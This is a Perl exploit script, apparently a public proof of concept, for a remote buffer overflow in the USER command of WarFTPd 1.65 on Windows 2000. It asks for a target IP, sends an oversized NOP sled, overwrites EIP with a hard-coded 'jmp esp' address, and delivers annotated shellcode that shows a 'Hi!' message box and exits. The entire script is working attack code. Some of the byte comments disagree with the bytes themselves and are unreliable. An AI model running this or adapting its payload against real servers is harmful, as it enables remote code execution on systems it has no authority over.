use IO::Socket;
$port=21;
$|=1;

	 	 	   	#Kernel32  jmp esp		7754a3ab
				#Kernel32  MessageBoxA	77e375d5
				#MSVCRT	   c_exit		78003985
				

print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";
print "\tEnter The Target IP :";

$ip = <STDIN>;
chomp $ip;



	$host = inet_aton($ip);
            $ServerAddr = sockaddr_in($port, $host);
    		$protocol_name = "tcp";
            socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
            select(CLIENT); $|=1; select(STDOUT);
    		if(connect(CLIENT, $ServerAddr)) {
				send(CLIENT,"user ",0);
				
				send(CLIENT,"\x90"x485,0);	  	 	   #485 nops to overwrite EIP
				send(CLIENT,"\xab\xa3\x54\x77",0);	   #Overwriting EIP with "jmp,esp" address via Kernel32.dll
				send(CLIENT,"\x90"x5,0); 			   #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c
				
				send(CLIENT,"\x55",0);						#push ebp - starting something new
				send(CLIENT,"\x8b\xec",0);					#mov ebp,esp
				send(CLIENT,"\x33\xff",0);					#xor edi,edi - edi = 0
				send(CLIENT,"\x57",0);						#push edi 
								
				send(CLIENT,"\xc6\x45\xfc\x48",0);			#mov byte ptr [ebp-0x4],0x6f - H
				send(CLIENT,"\xc6\x45\xfd\x69",0);			#mov byte ptr [ebp-0x3],0x78 - i
				send(CLIENT,"\xc6\x45\xfe\x21",0);			#mov byte ptr [ebp-0x2],0x21 - !
				
				
				send(CLIENT,"\xba\xd5\x75\xe3\x77",0);		#mov edx, 0x77e375d5 - MessageBoxA to edx
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x57",0);						#push edi
				send(CLIENT,"\x8d\x55\xfc",0);				#lea edx,[ebp-0x4] - move Hi! to edx
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x52",0);						#push edx
			
				send(CLIENT,"\x57",0);						#push edi
				send(CLIENT,"\xff\x55\xf8",0);				#call dword ptr [ebp-0x8]
				send(CLIENT,"\x55",0);						#push ebp - Start the exit stuff so we don't crash
				send(CLIENT,"\x8b\xec",0);					#move ebp,esp
				send(CLIENT,"\xba\x86\x41\x01\x89",0);		#mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
				send(CLIENT,"\x81\xea\x01\x08\x01\x11",0);	#sub edx, 0x11010201 - My leet-o way to get to the address with the null
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x33\xc0",0);					#xor eax,eax
				send(CLIENT,"\x50",0);						#push eax
				send(CLIENT,"\xff\x55\xfc",0);				#call dword ptr [ebp-0x4]
				
				send(CLIENT,"\n",0);
				
				close(CLIENT);
	
	}
